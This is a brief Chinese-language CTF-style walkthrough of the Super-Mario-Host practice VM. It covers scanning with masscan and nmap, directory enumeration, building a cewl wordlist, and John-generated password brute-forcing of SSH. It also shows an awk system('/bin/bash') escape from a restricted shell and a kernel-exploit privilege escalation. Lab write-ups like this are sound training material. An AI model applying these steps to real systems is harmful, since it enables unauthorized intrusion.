kali滲透綜合靶機(七)--Super-Mario-Host靶機
靶機百度雲下載 連結:https://pan.baidu.com/s/13l1FUgJjXArfoTOfcmPsbA 提取碼:a8ox
一、主機發現
1.netdiscover -i eth0 -r 192.168.10.0/24
二、埠掃描
1. masscan --rate=10000 -p0-65535 192.168.10.160
三、埠服務識別
1.nmap -sV -T4 -O 192.168.10.160 -p 22,80
四、漏洞發現與利用
1.掃描網站目錄
Dirb http://192.168.10.161:8180
2.發現http://192.168.10.161:8180/vhosts
3. 在本地hosts檔案新增解析記錄
4.瀏覽器訪問http://mario.supermariohost.local:8180/,別的什麼都沒有
5. 使用dirbuster掃描目錄,掃描出來如下目錄
6. 發現http://mario.supermariohost.local:8180/luigi.php
7. 發現http://mario.supermariohost.local:8180/command.php 測試luigi,發現存在
8.使用cewl爬取站點下的可疑使用者名稱作為使用者名稱字典
cewl http://mario.supermariohost.local:8180/ -d -w /root/user.txt
9. john在該user的基礎上生成相應社工密碼進行爆破
john --wordlist=user.txt --stdout --rules > passwd.txt
10.爆破出密碼,使用ssh登入,發現是受限的shell,使用awk呼叫系統命令,繞過限制
awk ‘BEGIN{system(“/bin/bash”)}’
11.檢視核心版本,然後再kali使用searchsploit查詢是否有exp
12.開始提權,成功獲得管理員許可權
總結:
1.資訊收集
2.dirbuster、dirb掃描目錄
3.測試使用者是否存在
4.使用cewl爬取站點下的可疑使用者名稱作為使用者名稱字典
5.john在該user的基礎上生成相應社工密碼進行爆破
6.受用awk呼叫系統命令繞過受限的shell
7.利用核心版本漏洞本地提權